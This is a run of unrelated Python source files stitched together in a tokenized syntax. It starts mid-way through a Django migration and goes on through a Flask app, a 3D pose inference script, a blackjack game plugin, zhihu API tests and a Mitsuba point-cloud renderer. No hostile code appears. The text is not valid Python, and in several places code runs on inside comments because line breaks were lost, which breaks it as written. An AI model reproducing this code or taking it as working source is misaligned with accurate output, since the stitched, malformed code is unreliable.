related_name='carousel_items' to='pages.VideoPage')) ] options={'ordering':['sort_order'] 'abstract':<false> } ) ]<block_end>
<import_from_stmt>flask Flask<import_from_stmt>datetime datetime<line_sep>app=Flask(__name__)<line_sep>@app.route("/")<def_stmt>hello <block_start><return>"Hello World! "+str(datetime.now())<block_end>
""" @author: <NAME> @contact: <EMAIL> """<import_stmt>os<import_stmt>argparse<import_stmt>json<import_stmt>cv2<import_from_stmt>tqdm tqdm<import_from_stmt>torch.utils.data DataLoader<import_from_stmt>cvpack.utils.logger get_logger<import_from_stmt>model.smap SMAP<import_from_stmt>model.refinenet RefineNet<import_from_stmt>lib.utils.dataloader get_test_loader<import_from_stmt>lib.utils.comm is_main_process<import_from_stmt>exps.stage3_root2.test_util *<import_from_stmt>dataset.custom_dataset CustomDataset<import_from_stmt>config cfg<import_stmt>dapalib<def_stmt>generate_3d_point_pairs model refine_model data_loader cfg logger device output_dir=''<block_start>os.makedirs(output_dir exist_ok=<true>)<line_sep>model.eval()<if_stmt>refine_model<is><not><none><block_start>refine_model.eval()<block_end>result=dict()<line_sep>result['model_pattern']=cfg.DATASET.NAME<line_sep>result['3d_pairs']=[]<line_sep># 3d_pairs has items like{'pred_2d':[[x,y,detZ,score]...], 'gt_2d':[[x,y,Z,visual_type]...], # 'pred_3d':[[X,Y,Z,score]...], 'gt_3d':[[X,Y,X]...], # 'root_d': (abs depth of root (float value) pred by network), # 'image_path': relative image path} kpt_num=cfg.DATASET.KEYPOINT.NUM<line_sep>data=tqdm(data_loader)<if>is_main_process()<else>data_loader<for_stmt>idx,batch enumerate(data)<block_start><if_stmt>cfg.TEST_MODE<eq>'run_inference'<block_start>imgs,img_path,scales=batch<line_sep>meta_data=<none><block_end><else_stmt><block_start>imgs,meta_data,img_path,scales=batch<block_end>imgs=imgs.to(device)<with_stmt>torch.no_grad()<block_start>outputs_2d,outputs_3d,outputs_rd=model(imgs)<line_sep>outputs_3d=outputs_3d.cpu()<line_sep>outputs_rd=outputs_rd.cpu()<if_stmt>cfg.DO_FLIP<block_start>imgs_flip=torch.flip(imgs [-1])<line_sep>outputs_2d_flip,outputs_3d_flip,outputs_rd_flip=model(imgs_flip)<line_sep>outputs_2d_flip=torch.flip(outputs_2d_flip dims=[-1])<line_sep># outputs_3d_flip = torch.flip(outputs_3d_flip, dims=[-1]) # outputs_rd_flip = torch.flip(outputs_rd_flip, dims=[-1]) keypoint_pair=cfg.DATASET.KEYPOINT.FLIP_ORDER<line_sep>paf_pair=cfg.DATASET.PAF.FLIP_CHANNEL<line_sep>paf_abs_pair=[x+kpt_num<for>x paf_pair]<line_sep>pair=keypoint_pair+paf_abs_pair<for_stmt>i range(len(pair))<block_start><if_stmt>i<ge>kpt_num<and>(i-kpt_num)%2<eq>0<block_start>outputs_2d[: i]<augadd>outputs_2d_flip[: pair[i]]<times>-1<block_end><else_stmt><block_start>outputs_2d[: i]<augadd>outputs_2d_flip[: pair[i]]<block_end><block_end>outputs_2d[: kpt_num:]<augmul>0.5<block_end><for_stmt>i range(len(imgs))<block_start><if_stmt>meta_data<is><not><none># remove person who was blocked <block_start>new_gt_bodys=[]<line_sep>annotation=meta_data[i].numpy()<line_sep>scale=scales[i]<for_stmt>j range(len(annotation))<block_start><if_stmt>annotation[j cfg.DATASET.ROOT_IDX 3]<g>1<block_start>new_gt_bodys.append(annotation[j])<block_end><block_end>gt_bodys=np.asarray(new_gt_bodys)<if_stmt>len(gt_bodys)<eq>0<block_start><continue><block_end># groundtruth:[person..[keypoints..[x, y, Z, score(0:None, 1:invisible, 2:visible), X, Y, Z, # f_x, f_y, cx, cy]]] <if_stmt>len(gt_bodys[0][0])<l>11<block_start>scale['f_x']=gt_bodys[0 0 7]<line_sep>scale['f_y']=gt_bodys[0 0 7]<line_sep>scale['cx']=scale['img_width']/2<line_sep>scale['cy']=scale['img_height']/2<block_end><else_stmt><block_start>scale['f_x']=gt_bodys[0 0 7]<line_sep>scale['f_y']=gt_bodys[0 0 8]<line_sep>scale['cx']=gt_bodys[0 0 9]<line_sep>scale['cy']=gt_bodys[0 0 10]<block_end><block_end><else_stmt><block_start>gt_bodys=<none><line_sep># use default values 
scale={k:scales[k][i].numpy()<for>k scales}<line_sep>scale['f_x']=scale['img_width']<line_sep>scale['f_y']=scale['img_width']<line_sep>scale['cx']=scale['img_width']/2<line_sep>scale['cy']=scale['img_height']/2<block_end>hmsIn=outputs_2d[i]<line_sep># if the first pair is [1, 0], uncomment the code below # hmsIn[cfg.DATASET.KEYPOINT.NUM:cfg.DATASET.KEYPOINT.NUM+2] *= -1 # outputs_3d[i, 0] *= -1 hmsIn[:cfg.DATASET.KEYPOINT.NUM]<augdiv>255<line_sep>hmsIn[cfg.DATASET.KEYPOINT.NUM:]<augdiv>127<line_sep>rDepth=outputs_rd[i][0]<line_sep># no batch implementation yet pred_bodys_2d=dapalib.connect(hmsIn rDepth cfg.DATASET.ROOT_IDX distFlag=<true>)<if_stmt>len(pred_bodys_2d)<g>0<block_start>pred_bodys_2d[: : :2]<augmul>cfg.dataset.STRIDE# resize poses to the input-net shape pred_bodys_2d=pred_bodys_2d.numpy()<block_end>pafs_3d=outputs_3d[i].numpy().transpose(1 2 0)<line_sep>root_d=outputs_rd[i][0].numpy()<line_sep>paf_3d_upsamp=cv2.resize(pafs_3d (cfg.INPUT_SHAPE[1] cfg.INPUT_SHAPE[0]) interpolation=cv2.INTER_NEAREST)<line_sep>root_d_upsamp=cv2.resize(root_d (cfg.INPUT_SHAPE[1] cfg.INPUT_SHAPE[0]) interpolation=cv2.INTER_NEAREST)<line_sep># generate 3d prediction bodys pred_bodys_2d=register_pred(pred_bodys_2d gt_bodys)<if_stmt>len(pred_bodys_2d)<eq>0<block_start><continue><block_end>pred_rdepths=generate_relZ(pred_bodys_2d paf_3d_upsamp root_d_upsamp scale)<line_sep>pred_bodys_3d=gen_3d_pose(pred_bodys_2d pred_rdepths scale)<if_stmt>refine_model<is><not><none><block_start>new_pred_bodys_3d=lift_and_refine_3d_pose(pred_bodys_2d pred_bodys_3d refine_model device=device root_n=cfg.DATASET.ROOT_IDX)<block_end><else_stmt><block_start>new_pred_bodys_3d=pred_bodys_3d<block_end><if_stmt>cfg.TEST_MODE<eq>"generate_train"<block_start>save_result_for_train_refine(pred_bodys_2d new_pred_bodys_3d gt_bodys pred_rdepths result)<block_end><else_stmt><block_start>save_result(pred_bodys_2d new_pred_bodys_3d gt_bodys pred_rdepths img_path[i] result)<block_end><block_end><block_end><block_end>dir_name=os.path.split(os.path.split(os.path.realpath(__file__))[0])[1]<line_sep>pair_file_name=os.path.join(output_dir '{}_{}_{}_{}.json'.format(dir_name cfg.TEST_MODE cfg.DATA_MODE cfg.JSON_SUFFIX_NAME))<with_stmt>open(pair_file_name 'w')<as>f<block_start>json.dump(result f)<block_end>logger.info("Pairs writed to {}".format(pair_file_name))<block_end><def_stmt>main <block_start>parser=argparse.ArgumentParser()<line_sep>parser.add_argument("--test_mode" "-t" type=str default="run_inference" choices=['generate_train' 'generate_result' 'run_inference'] help='Type of test. 
One of "generate_train": generate refineNet datasets, '<concat>'"generate_result": save inference result and groundtruth, '<concat>'"run_inference": save inference result for input images.')<line_sep>parser.add_argument("--data_mode" "-d" type=str default="test" choices=['test' 'generation'] help='Only used for "generate_train" test_mode, "generation" for refineNet train dataset,'<concat>'"test" for refineNet test dataset.')<line_sep>parser.add_argument("--SMAP_path" "-p" type=str default='log/SMAP.pth' help='Path to SMAP model')<line_sep>parser.add_argument("--RefineNet_path" "-rp" type=str default='' help='Path to RefineNet model, empty means without RefineNet')<line_sep>parser.add_argument("--batch_size" type=int default=1 help='Batch_size of test')<line_sep>parser.add_argument("--do_flip" type=float default=0 help='Set to 1 if do flip when test')<line_sep>parser.add_argument("--dataset_path" type=str default="" help='Image dir path of "run_inference" test mode')<line_sep>parser.add_argument("--json_name" type=str default="" help='Add a suffix to the result json.')<line_sep>args=parser.parse_args()<line_sep>cfg.TEST_MODE=args.test_mode<line_sep>cfg.DATA_MODE=args.data_mode<line_sep>cfg.REFINE=len(args.RefineNet_path)<g>0<line_sep>cfg.DO_FLIP=args.do_flip<line_sep>cfg.JSON_SUFFIX_NAME=args.json_name<line_sep>cfg.TEST.IMG_PER_GPU=args.batch_size<line_sep>os.makedirs(cfg.TEST_DIR exist_ok=<true>)<line_sep>logger=get_logger(cfg.DATASET.NAME cfg.TEST_DIR 0 'test_log_{}.txt'.format(args.test_mode))<line_sep>model=SMAP(cfg run_efficient=cfg.RUN_EFFICIENT)<line_sep>device=torch.device(cfg.MODEL.DEVICE)<line_sep>model.to(device)<if_stmt>args.test_mode<eq>"run_inference"<block_start>test_dataset=CustomDataset(cfg args.dataset_path)<line_sep>data_loader=DataLoader(test_dataset batch_size=args.batch_size shuffle=<false>)<block_end><else_stmt><block_start>data_loader=get_test_loader(cfg num_gpu=1 local_rank=0 stage=args.data_mode)<block_end><if_stmt>cfg.REFINE<block_start>refine_model=RefineNet()<line_sep>refine_model.to(device)<line_sep>refine_model_file=args.RefineNet_path<block_end><else_stmt><block_start>refine_model=<none><line_sep>refine_model_file=""<block_end>model_file=args.SMAP_path<if_stmt>os.path.exists(model_file)<block_start>state_dict=torch.load(model_file map_location=<lambda>storage loc:storage)<line_sep>state_dict=state_dict['model']<line_sep>model.load_state_dict(state_dict)<if_stmt>os.path.exists(refine_model_file)<block_start>refine_model.load_state_dict(torch.load(refine_model_file))<block_end><elif_stmt>refine_model<is><not><none><block_start>logger.info("No such RefineNet checkpoint of {}".format(args.RefineNet_path))<line_sep><return><block_end>generate_3d_point_pairs(model refine_model data_loader cfg logger device output_dir=os.path.join(cfg.OUTPUT_DIR "result"))<block_end><else_stmt><block_start>logger.info("No such checkpoint of SMAP {}".format(args.SMAP_path))<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>main()<block_end>
# Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See LICENSE in the project root # for license information. <import_from_future_stmt> absolute_import division print_function unicode_literals<line_sep># Expose Session directly. <def_stmt>Session *args **kwargs<block_start><import_from_stmt>tests.debug session<line_sep><return>session.Session(*args **kwargs)<block_end>
<import_stmt>schedule time sys os traceback<line_sep>sys.path.append(os.getcwd())<import_from_stmt>material_sync.sync_to_baidu_cloud Sync2Cloud<line_sep>p=Sync2Cloud().main<line_sep>schedule.every(1).days.at("03:00").do(p)<line_sep># schedule.every(1).minutes.do(p) print("Script started")<while_stmt><true><block_start><try_stmt><block_start>schedule.run_pending()<line_sep>time.sleep(1)<block_end><except_stmt>Exception<as>e<block_start>traceback.print_exc()<line_sep>print(e)<block_end><block_end>
# Generated by Django 1.9.12 on 2017-03-09 02:05 <import_from_stmt>django.db migrations<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[]<line_sep>operations=[]<block_end>
<import_stmt>random<import_from_stmt>plugin plugin<import_from_stmt>colorama Fore<def_stmt>delay # method to pause after a series of actions have been completed. <block_start>n=input("Press enter to continue")<block_end><def_stmt>wiped_slate player# resets all hands and bets <block_start>player['hands']=[]<line_sep>player['suits']=[]<line_sep>player['bets']=[]<line_sep><return>player<block_end><def_stmt>pprinthand hand suit type='visible'# returns hand as a string which may or may not be hidden. <block_start>temphand=hand[:]<for_stmt>i range(len(temphand))<block_start><if_stmt>temphand[i]<eq>1<or>temphand[i]<eq>11<block_start>temphand[i]='A'# 1 or 11 is value of ace. <block_end>temphand[i]=str(temphand[i])+" of "+suit[i]<block_end><if_stmt>type<eq>'visible'<block_start><return>str(temphand)<block_end><elif_stmt>type<eq>'partially-visible'<block_start><return>'['+str(temphand[0])+',hidden]'<block_end><block_end><def_stmt>pprinthandlist handlist suitlist# returns handlist as a string <block_start>newhandlist=[]<for_stmt>i range(len(handlist))<block_start>newhandlist.append(pprinthand(handlist[i] suitlist[i]))<block_end><return>str(newhandlist)<block_end><def_stmt>blackjacksum orig_hand# computes the sum by assuming appropriate value of Ace. <block_start>hand=orig_hand[:]<for_stmt>i range(len(hand))<block_start><if_stmt>str(hand[i])<in>'JQK'# converts face card to their value,that is,10. <block_start>hand[i]=10<block_end><block_end><if_stmt>sum(hand)<le>11# of Ace card(either 1 or 11) acc. to the sum. <block_start><for_stmt>i range(len(hand))<block_start><if_stmt>hand[i]<eq>1<block_start>hand[i]=11<line_sep>orig_hand[i]=11<line_sep><break><block_end><block_end><block_end><elif_stmt>sum(hand)<g>21<block_start><for_stmt>i range(len(hand))<block_start><if_stmt>hand[i]<eq>11<block_start>hand[i]=1<line_sep>orig_hand[i]=1<line_sep><break><block_end><block_end><block_end><return>sum(hand) orig_hand<block_end><def_stmt>move hand suit cards suits bet# Here, hand is a nested list inside a list. It is a list of all hands of a player. # Player can have multiple hands if he/she chooses to split. <block_start>sum_,hand[0]=blackjacksum(hand[0])<line_sep>print("Your hand is" pprinthand(hand[0] suit[0]))<line_sep>print("Your sum is" sum_)<line_sep>print('---------------------------')<line_sep># checks for bust or blackjack. 
<if_stmt>sum_<g>21<block_start>print("You got busted!")<line_sep><return>hand suit bet<block_end><elif_stmt>sum_<eq>21<and>len(hand)<eq>2<block_start>print("Blackjack!")<line_sep><return>hand suit bet<block_end><while_stmt><true><block_start>choice=input("Press H to Hit, S to Stand, D to Double-Down, P to sPlit\n")<if_stmt>choice<in>['H' 'h']<block_start>newcard=random.choice(cards)<line_sep>newsuit=random.choice(suits)<line_sep>print("Newcard is" str(newcard)+" of "+newsuit)<line_sep>hand[0].append(newcard)<line_sep>suit[0].append(newsuit)<line_sep>print("Updated hand is" pprinthand(hand[0] suit[0]))<line_sep>sum_,hand[0]=blackjacksum(hand[0])<line_sep>hand,suit,bet=move(hand suit cards suits bet)<line_sep><return>hand suit bet<block_end><elif_stmt>choice<in>['S' 's']<block_start><return>hand suit bet<block_end><elif_stmt>choice<in>['D' 'd']<block_start>newcard=random.choice(cards)<line_sep>print("Newcard is" newcard)<line_sep>newsuit=random.choice(suits)<line_sep>hand[0].append(newcard)<line_sep>suit[0].append(newsuit)<line_sep>print("Updated hand is" pprinthand(hand[0] suit[0]))<line_sep>sum_,hand[0]=blackjacksum(hand[0])<line_sep>print("Your sum is" sum_)<if_stmt>sum_<g>21<block_start>print("You got busted!")<block_end>bet[0]=bet[0]<times>2<line_sep>print("Your new bet is" bet[0])<line_sep><return>hand suit bet<block_end><elif_stmt>choice<in>['P' 'p']<block_start><if_stmt>hand[0][0]<eq>hand[0][1]<block_start><if_stmt><not>hand[0][0]<eq>1<block_start>splitHand1=[[0 0]]<line_sep>splitHand2=[[0 0]]<line_sep>splitSuit1=[[0 0]]<line_sep>splitSuit2=[[0 0]]<line_sep>newcard1=random.choice(cards)<line_sep>newsuit1=random.choice(suits)<line_sep>print("Newcard for first split is" str(newcard1)+" of "+newsuit1)<line_sep>newcard2=random.choice(cards)<line_sep>newsuit2=random.choice(suits)<line_sep>print("Newcard for second split is" str(newcard2)+" of "+newsuit2)<line_sep>splitHand1[0][0]=hand[0][0]<line_sep>splitHand2[0][0]=hand[0][1]<line_sep>splitHand1[0][1]=newcard1<line_sep>splitHand2[0][1]=newcard2<line_sep>splitSuit1[0][0]=suit[0][0]<line_sep>splitSuit2[0][0]=suit[0][1]<line_sep>splitSuit1[0][1]=newsuit1<line_sep>splitSuit2[0][1]=newsuit2<line_sep>print("Split hands are" pprinthand(splitHand1[0] splitSuit1[0]) ", " pprinthand(splitHand2[0] splitSuit2[0]))<line_sep>sum1,splitHand1[0]=blackjacksum(splitHand1[0])<line_sep>sum2,splitHand2[0]=blackjacksum(splitHand2[0])<line_sep>print("Your sum for split 1 is" sum1)<line_sep>print("Your sum for split 2 is" sum2)<line_sep>bet1=bet[:]<line_sep>bet2=bet[:]<line_sep>splitHand1,splitSuit1,bet1=move(splitHand1 splitSuit1 cards suits bet1)<line_sep>splitHand2,splitSuit2,bet2=move(splitHand2 splitSuit2 cards suits bet2)<line_sep>splitHand1.extend(splitHand2)# converting both hands to a single list splitSuit1.extend(splitSuit2)<line_sep>bet1.extend(bet2)# converting both bets to a single list <return>splitHand1 splitSuit1 bet1<block_end><else_stmt><block_start>print("Sorry,you can't split aces")<line_sep>hand,suit,bet=move(hand suit cards suits bet)<line_sep><return>hand suit bet<block_end><block_end><else_stmt><block_start>print("Sorry, you can only split hands with identical cards")<line_sep>hand,suit,bet=move(hand suit cards suits bet)<line_sep><return>hand suit bet<block_end><block_end><else_stmt><block_start>print("Please try again with a valid choice.")<block_end><block_end><block_end>@plugin('blackjack')<def_stmt>blackjack jarvis s<block_start>jarvis.say("Welcome to the casino! Let's play blackjack!" 
Fore.GREEN)<line_sep>player={"hands":[] "suits":[] "bets":[] 'profit':[]}<line_sep>cards=[1 2 3 4 5 6 7 8 9 10 'J' 'Q' 'K']<line_sep>suits=['spades' 'hearts' 'diamonds' 'clubs']<line_sep>choice='y'<line_sep>delay()<line_sep># Instructions jarvis.say('How to play:' Fore.GREEN)<line_sep>jarvis.say('-->The goal of blackjack is to beat the dealer\'s hand without going over 21.' Fore.CYAN)<line_sep>jarvis.say('-->Face cards are worth 10. Aces are worth 1 or 11, whichever makes a better hand.' Fore.CYAN)<line_sep>jarvis.say('-->Each player starts with two cards, one of the dealer\'s cards is hidden until the end.' Fore.CYAN)<line_sep>jarvis.say('-->To \'Hit\' is to ask for another card. To \'Stand\' is to hold your total and end your turn.' Fore.CYAN)<line_sep>jarvis.say('-->If you go over 21 you bust, and the dealer wins regardless of the dealer\'s hand.' Fore.CYAN)<line_sep>jarvis.say('-->If you are dealt 21 from the start (Ace & 10), you got a blackjack.' Fore.CYAN)<line_sep>jarvis.say('-->Blackjack means you win 1.5 the amount of your bet.' Fore.CYAN)<line_sep>jarvis.say('-->Dealer will hit until his/her cards total 17 or higher.' Fore.CYAN)<line_sep>jarvis.say('-->Doubling is like a hit, only the bet is doubled and you only get one more card.' Fore.CYAN)<line_sep>jarvis.say('-->Split can be done when you have two of the same card - the pair is split into two hands.' Fore.CYAN)<line_sep>jarvis.say('-->Splitting also doubles the bet, because each new hand is worth the original bet.' Fore.CYAN)<line_sep>jarvis.say('-->You cannot split two aces.' Fore.CYAN)<line_sep>jarvis.say('-->You can double on a hand resulting from a split, tripling or quadrupling you bet.' Fore.CYAN)<while_stmt>choice<in>"Yy"<block_start>jarvis.say('Shuffling the cards....' Fore.BLUE)<line_sep>jarvis.say("Let's start the game!" Fore.BLUE)<line_sep># Bets jarvis.say("How much are you betting?" Fore.BLUE)<line_sep>bet=jarvis.input_number()<line_sep>player['bets'].append(bet)<line_sep>delay()<line_sep>jarvis.say('---------------------------')<line_sep># Cards jarvis.say("Dealing the cards............" Fore.BLUE)<line_sep>jarvis.say("Your cards...." Fore.BLUE)<line_sep>hand=[random.choice(cards) random.choice(cards)]<line_sep>suit=[random.choice(suits) random.choice(suits)]<line_sep>player["hands"].append(hand)<line_sep>player["suits"].append(suit)<line_sep>jarvis.say(pprinthand(hand suit))<line_sep>delay()<line_sep>jarvis.say('---------------------------')<line_sep># Dealer's cards dealerhand=[random.choice(cards) random.choice(cards)]<line_sep>dealersuit=[random.choice(suits) random.choice(suits)]<line_sep>jarvis.say("Dealer hand: "+pprinthand(dealerhand dealersuit type='partially-visible') Fore.MAGENTA)<line_sep>delay()<line_sep>jarvis.say('---------------------------')<line_sep># Players' moves jarvis.say("It's your turn, make your choice!" 
Fore.BLUE)<line_sep>player['hands'],player['suits'],player['bets']=move(player['hands'] player['suits'] cards suits player['bets'])<line_sep>jarvis.say("Your hands and respective bets for this round are:" Fore.BLUE)<line_sep>jarvis.say(pprinthandlist(player['hands'] player['suits'])+" "+str(player['bets']) Fore.BLUE)<line_sep>delay()<line_sep>jarvis.say('---------------------------')<line_sep># Dealer's moves jarvis.say("Dealer hand: "+pprinthand(dealerhand dealersuit) Fore.MAGENTA)<line_sep>dealersum,dealerhand=blackjacksum(dealerhand)<line_sep>jarvis.say("Dealer's sum is "+str(dealersum) Fore.MAGENTA)<while_stmt>dealersum<l>17<or>(dealersum<eq>17<and>11<in>dealerhand)# condition which determines if dealer hits or not. <block_start>jarvis.say("Dealer draws another card" Fore.MAGENTA)<line_sep>dealerhand.append(random.choice(cards))<line_sep>dealersuit.append(random.choice(suits))<line_sep>jarvis.say("Newcard is "+str(dealerhand[-1])+" of "+str(dealersuit[-1]) Fore.MAGENTA)<line_sep>dealersum,dealerhand=blackjacksum(dealerhand)<line_sep>jarvis.say("Dealer's sum is "+str(dealersum) Fore.MAGENTA)<line_sep>jarvis.say("Dealer's hand is "+pprinthand(dealerhand dealersuit) Fore.MAGENTA)<block_end>delay()<line_sep>jarvis.say('---------------------------')<line_sep># Profit Calculation jarvis.say("Let's see your results " Fore.BLUE)<for_stmt>j range(len(player['hands']))<block_start>hand=player['hands'][j]<line_sep>suit=player['suits'][j]<line_sep>bet=player['bets'][j]<line_sep>sum_,hand=blackjacksum(hand)<line_sep>dealersum,dealerhand=blackjacksum(dealerhand)<line_sep>jarvis.say("For the hand- "+pprinthand(hand suit)+' sum is-'+str(sum_) Fore.BLUE)<if_stmt>len(hand)<eq>2<and>sum_<eq>21<block_start>jarvis.say("Blackjack!" Fore.BLUE)<line_sep>profit=bet<times>1.5<line_sep>player['profit'].append(bet<times>1.5)<block_end><elif_stmt>sum_<g>21<block_start>jarvis.say("Busted" Fore.BLUE)<line_sep>profit=bet<times>-1<line_sep>player['profit'].append(bet<times>-1)<block_end><elif_stmt>dealersum<g>21<block_start>jarvis.say("Dealer Busted" Fore.BLUE)<line_sep>profit=bet<times>1<line_sep>player['profit'].append(bet<times>1)<block_end><elif_stmt>dealersum<g>sum_<block_start>jarvis.say("You lost" Fore.BLUE)<line_sep>profit=bet<times>-1<line_sep>player['profit'].append(bet<times>-1)<block_end><elif_stmt>sum_<g>dealersum<block_start>jarvis.say("You win" Fore.BLUE)<line_sep>profit=bet<times>1<line_sep>player['profit'].append(bet<times>1)<block_end><elif_stmt>sum_<eq>21<and>dealersum<eq>21<and>len(dealerhand)<eq>2<and>len(hand)<g>2<block_start>jarvis.say("You lost" Fore.BLUE)<line_sep>profit=bet<times>-1<line_sep>player['profit'].append(bet<times>-1)<block_end><elif_stmt>sum_<eq>dealersum<block_start>jarvis.say("Push" Fore.BLUE)<line_sep>profit=bet<times>0<line_sep>player['profit'].append(bet<times>0)<block_end>jarvis.say("Profit is- "+str(profit) Fore.BLUE)<block_end>players=wiped_slate(player)<line_sep>choice=jarvis.input("Do you wish to play another round?Y/n \n" Fore.GREEN)<block_end>jarvis.say("OK then, Let's see the results" Fore.GREEN)<line_sep>jarvis.say('---------------------------')<line_sep>profit=sum(player['profit'])<if_stmt>profit<ge>0<block_start>jarvis.say("Your total profit is "+str(profit) Fore.GREEN)<block_end><else_stmt><block_start>jarvis.say("Your total loss is "+str(profit<times>-1) Fore.GREEN)<block_end>jarvis.say("Goodbye, Let's play again sometime!" Fore.GREEN)<block_end>
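# Small hedged sanity check of blackjacksum's card valuation (not part of the plugin itself); run the file # directly to verify: face cards count as 10, and an ace counts as 11 only while that keeps the total at # 21 or below, otherwise as 1. <if_stmt>__name__<eq>'__main__'<block_start><assert_stmt>blackjacksum([1 'K'])[0]<eq>21<assert_stmt>blackjacksum([1 'K' 5])[0]<eq>16<assert_stmt>blackjacksum(['Q' 'J' 2])[0]<eq>22<line_sep>print("blackjacksum behaves as described")<block_end>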
<import_stmt>FWCore.ParameterSet.Config<as>cms<line_sep>gbrwrappermaker=cms.EDAnalyzer('GBRWrapperMaker')<line_sep>
# encoding: utf-8 <import_stmt>unittest<import_from_stmt>zhihu Question<class_stmt>QuestionTestCase(unittest.TestCase)<block_start><def_stmt>test_follow_question_with_id self<block_start>data=Question(id=32096743).follow_question()<line_sep>self.assertEqual({"is_following":<true>} data)<block_end><def_stmt>test_unfollow_question_with_id self<block_start>data=Question(id=32096743).unfollow_question()<line_sep>self.assertEqual({"is_following":<false>} data)<block_end><def_stmt>test_follow_question_with_url self<block_start>data=Question(url='https://www.zhihu.com/question/58684385').follow_question()<line_sep>self.assertEqual({"is_following":<true>} data)<block_end><def_stmt>test_follow_question_with_answer_url self<block_start>""" Answer URLs are also supported, because the question ID can be recovered from an answer URL. :return: """<line_sep>data=Question(url='https://www.zhihu.com/question/59001738/answer/160832685').follow_question()<line_sep>self.assertEqual({"is_following":<true>} data)<block_end><def_stmt>test_unfollow_question_with_url self<block_start>data=Question(url='https://www.zhihu.com/question/58684385').unfollow_question()<line_sep>self.assertEqual({"is_following":<false>} data)<block_end><block_end>
"""image manager"""<import_from_stmt>.puller ImagePuller<import_from_stmt>.inspector inspect_all<line_sep>
<import_stmt>os<import_stmt>numpy<as>np<def_stmt>standardize_bbox pcl points_per_object<block_start>pt_indices=np.random.choice(pcl.shape[0] points_per_object replace=<false>)<line_sep>np.random.shuffle(pt_indices)<line_sep>pcl=pcl[pt_indices]# n by 3 mins=np.amin(pcl axis=0)<line_sep>maxs=np.amax(pcl axis=0)<line_sep>center=(mins+maxs)/2.<line_sep>scale=np.amax(maxs-mins)<line_sep>print("Center: {}, Scale: {}".format(center scale))<line_sep>result=((pcl-center)/scale).astype(np.float32)# [-0.5, 0.5] <return>result<block_end>xml_head=""" <scene version="0.5.0"> <integrator type="path"> <integer name="maxDepth" value="-1"/> </integrator> <sensor type="perspective"> <float name="farClip" value="100"/> <float name="nearClip" value="0.1"/> <transform name="toWorld"> <lookat origin="3,3,3" target="0,0,0" up="0,0,1"/> </transform> <float name="fov" value="25"/> <sampler type="ldsampler"> <integer name="sampleCount" value="256"/> </sampler> <film type="ldrfilm"> <integer name="width" value="1600"/> <integer name="height" value="1200"/> <rfilter type="gaussian"/> <boolean name="banner" value="false"/> </film> </sensor> <bsdf type="roughplastic" id="surfaceMaterial"> <string name="distribution" value="ggx"/> <float name="alpha" value="0.05"/> <float name="intIOR" value="1.46"/> <rgb name="diffuseReflectance" value="1,1,1"/> <!-- default 0.5 --> </bsdf> """<line_sep>xml_ball_segment=""" <shape type="sphere"> <float name="radius" value="0.02"/> <transform name="toWorld"> <translate x="{}" y="{}" z="{}"/> <scale value="0.7"/> </transform> <bsdf type="diffuse"> <rgb name="reflectance" value="{},{},{}"/> </bsdf> </shape> """<line_sep>xml_tail=""" <shape type="rectangle"> <ref name="bsdf" id="surfaceMaterial"/> <transform name="toWorld"> <scale x="10" y="10" z="10"/> <translate x="0" y="0" z="-0.5"/> </transform> </shape> <shape type="rectangle"> <transform name="toWorld"> <scale x="10" y="10" z="1"/> <lookat origin="-4,4,20" target="0,0,0" up="0,0,1"/> </transform> <emitter type="area"> <rgb name="radiance" value="6,6,6"/> </emitter> </shape> </scene> """<def_stmt>colormap x y z<block_start>vec=np.array([x y z])<line_sep>vec=np.clip(vec 0.001 1.0)<line_sep>norm=np.sqrt(np.sum(vec<power>2))<line_sep>vec<augdiv>norm<line_sep><return>[vec[0] vec[1] vec[2]]<block_end><def_stmt>mitsuba pcl path clr=<none><block_start>xml_segments=[xml_head]<line_sep># pcl = standardize_bbox(pcl, 2048) pcl=pcl[: [2 0 1]]<line_sep>pcl[: 0]<augmul>-1<line_sep>h=np.min(pcl[: 2])<for_stmt>i range(pcl.shape[0])<block_start><if_stmt>clr<eq><none><block_start>color=colormap(pcl[i 0]+0.5 pcl[i 1]+0.5 pcl[i 2]+0.5)<block_end><else_stmt><block_start>color=clr<block_end><if_stmt>h<l>-0.25<block_start>xml_segments.append(xml_ball_segment.format(pcl[i 0] pcl[i 1] pcl[i 2]-h-0.6875 *color))<block_end><else_stmt><block_start>xml_segments.append(xml_ball_segment.format(pcl[i 0] pcl[i 1] pcl[i 2] *color))<block_end><block_end>xml_segments.append(xml_tail)<line_sep>xml_content=str.join('' xml_segments)<with_stmt>open(path 'w')<as>f<block_start>f.write(xml_content)<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>item=0<line_sep>split='train'<line_sep>dataset_name='shapenetcorev2'<line_sep>root=os.getcwd()<line_sep>save_root=os.path.join("image" dataset_name)<if_stmt><not>os.path.exists(save_root)<block_start>os.makedirs(save_root)<block_end><import_from_stmt>dataset Dataset<line_sep>d=Dataset(root=root dataset_name=dataset_name num_points=2048 split=split random_rotation=<false> load_name=<true>)<line_sep>print("datasize:" 
d.__len__())<line_sep>pts,lb,n=d[item]<line_sep>print(pts.size() pts.type() lb.size() lb.type() n)<line_sep>path=os.path.join(save_root dataset_name+'_'+split+str(item)+'_'+str(n)+'.xml')<line_sep>mitsuba(pts.numpy() path)<block_end>
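# A minimal sketch of the same rendering pipeline with a synthetic point cloud instead of the
# shapenetcorev2 Dataset used above. The only requirements standardize_bbox() and mitsuba()
# rely on here are an (N, 3) array and a writable .xml output path; the file name is arbitrary.
import numpy as np

pcl = np.random.rand(4096, 3) - 0.5          # fake (N, 3) cloud, roughly centred
pcl = standardize_bbox(pcl, 2048)            # subsample to 2048 points, scale into [-0.5, 0.5]
mitsuba(pcl, 'random_cloud.xml')             # writes a Mitsuba 0.5 scene description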
